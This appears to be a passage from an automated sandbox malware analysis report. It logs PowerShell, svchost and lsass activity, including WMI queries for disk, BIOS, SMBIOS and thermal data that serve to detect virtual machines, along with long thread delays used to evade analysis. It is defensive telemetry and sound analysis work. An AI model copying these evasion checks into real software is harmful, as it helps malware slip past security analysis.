        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
        Source: C:\Windows\System32\svchost.exeWMI Queries: MSSmBios_RawSMBiosTables
        Source: C:\Windows\System32\svchost.exeWMI Queries: MSSmBios_RawSMBiosTables
        Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName="MSSmBios_RawSMBiosTables",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982926,LowDateTime=1699781275
        Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName="MSSmBios_RawSMBiosTables",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982926,LowDateTime=1699781275
        Queries temperature or sensor information (via WMI often done to detect virtual machines)
        Source: C:\Windows\System32\svchost.exeWMI Queries: MSAcpi_ThermalZoneTemperature
        Source: C:\Windows\System32\svchost.exeWMI Queries: MSAcpi_ThermalZoneTemperature
        Source: C:\Windows\System32\svchost.exeWMI Queries: WDMClassesOfDriver.ClassName="MSAcpi_ThermalZoneTemperature",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982926,LowDateTime=1699781275
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3658Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2644Jump to behavior
        Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 1118Jump to behavior
        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1105Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4986Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1578Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4801Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4953Jump to behavior
        Source: C:\Windows\System32\more.comWindow / User API: threadDelayed 1082Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6458Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 952Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 7519Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 944Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 837Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1342Jump to behavior
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8236Jump to behavior
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 708Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1366Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1367Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1280Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1207Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1120Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1289Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1283Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1255Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1237Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1265Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1268Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1186Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1143Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1174Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1211Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1166Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 813Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 799Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 795Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 789Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 772Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 803
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 767
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1031
        Source: C:\Windows\System32\spoolsv.exeWindow / User API: threadDelayed 1073
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1039
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1081
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1080
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1104
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 704
        Source: C:\Windows\System32\cmd.exeAPI coverage: 9.8 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.6 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.3 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.6 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.3 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.5 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440Thread sleep count: 3658 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436Thread sleep count: 2644 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8496Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8456Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\cmd.exe TID: 2640Thread sleep time: -55900s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8608Thread sleep count: 4986 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8608Thread sleep count: 1578 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640Thread sleep time: -7378697629483816s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8624Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8972Thread sleep time: -15679732462653109s >= -30000sJump to behavior
        Source: C:\Windows\System32\more.com TID: 5396Thread sleep count: 1082 > 30Jump to behavior
        Source: C:\Windows\System32\more.com TID: 5396Thread sleep time: -54100s >= -30000sJump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 9168Thread sleep count: 6458 > 30Jump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 9168Thread sleep time: -6458000s >= -30000sJump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 9156Thread sleep count: 952 > 30Jump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 9156Thread sleep time: -95200s >= -30000sJump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 9196Thread sleep count: 7519 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 9196Thread sleep time: -7519000s >= -30000sJump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 9200Thread sleep count: 944 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 9200Thread sleep time: -47200s >= -30000sJump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 9196Thread sleep count: 837 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 9196Thread sleep time: -837000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 9208Thread sleep count: 44 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 9208Thread sleep time: -44000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 9212Thread sleep count: 1342 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 9212Thread sleep time: -67100s >= -30000sJump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 6916Thread sleep count: 8236 > 30Jump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 6916Thread sleep time: -8236000s >= -30000sJump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 6920Thread sleep count: 708 > 30Jump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 6920Thread sleep time: -35400s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6928Thread sleep count: 104 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6928Thread sleep time: -104000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6932Thread sleep count: 1366 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6932Thread sleep time: -68300s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6944Thread sleep count: 1367 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6944Thread sleep time: -68350s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6952Thread sleep count: 108 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6952Thread sleep time: -108000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6956Thread sleep count: 1280 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6956Thread sleep time: -64000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep count: 45 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep time: -45000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6968Thread sleep count: 1207 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6968Thread sleep time: -60350s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7000Thread sleep count: 1120 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7000Thread sleep time: -56000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7028Thread sleep count: 103 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7028Thread sleep time: -103000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7032Thread sleep count: 1289 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7032Thread sleep time: -64450s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7048Thread sleep count: 1283 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7048Thread sleep time: -64150s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5948Thread sleep count: 1255 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5948Thread sleep time: -62750s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5900Thread sleep count: 1237 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5900Thread sleep time: -61850s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6972Thread sleep count: 1265 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6972Thread sleep time: -63250s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6976Thread sleep count: 1268 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6976Thread sleep time: -63400s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 8248Thread sleep count: 1186 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 8248Thread sleep time: -59300s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6760Thread sleep count: 1143 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6760Thread sleep time: -57150s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6828Thread sleep count: 1174 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6828Thread sleep time: -58700s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5444Thread sleep count: 1211 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5444Thread sleep time: -60550s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7664Thread sleep count: 1166 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7664Thread sleep time: -58300s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7964Thread sleep count: 813 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7964Thread sleep time: -40650s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 8212Thread sleep count: 92 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 8212Thread sleep time: -92000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 8252Thread sleep count: 799 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 8252Thread sleep time: -39950s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 8348Thread sleep count: 795 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 8348Thread sleep time: -39750s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1672Thread sleep count: 789 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1672Thread sleep time: -39450s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2360Thread sleep count: 772 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2360Thread sleep time: -38600s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5608Thread sleep count: 803 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5608Thread sleep time: -40150s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8428Thread sleep count: 767 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8428Thread sleep time: -38350s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8392Thread sleep count: 189 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6156Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8404Thread sleep count: 1031 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8404Thread sleep time: -51550s >= -30000s
        Source: C:\Windows\System32\spoolsv.exe TID: 8432Thread sleep count: 1073 > 30
        Source: C:\Windows\System32\spoolsv.exe TID: 8432Thread sleep time: -53650s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8456Thread sleep count: 1039 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8456Thread sleep time: -51950s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8488Thread sleep count: 1081 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8488Thread sleep time: -54050s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8384Thread sleep count: 57 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8384Thread sleep time: -57000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8380Thread sleep count: 1080 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8380Thread sleep time: -54000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8408Thread sleep count: 91 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8408Thread sleep time: -91000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8360Thread sleep count: 1104 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8360Thread sleep time: -55200s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8336Thread sleep count: 704 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8336Thread sleep time: -35200s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\more.comLast function: Thread delayed
        Source: C:\Windows\System32\more.comLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
        Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
        Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA0F264 FindFirstFileExW,3_2_000001D54FA0F264
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA0F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_000001D54FA0F3E8
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00000281B7BCF3E8
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BCF264 FindFirstFileExW,4_2_00000281B7BCF264
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D19F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_000001F66D19F3E8
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D19F264 FindFirstFileExW,9_2_000001F66D19F264
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB937F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_0000019AB937F3E8
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB937F264 FindFirstFileExW,14_2_0000019AB937F264
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDAF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001A53EDAF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDAF264 FindFirstFileExW,15_2_000001A53EDAF264
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4CF264 FindFirstFileExW,17_2_0000027D8F4CF264
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_0000027D8F4CF3E8
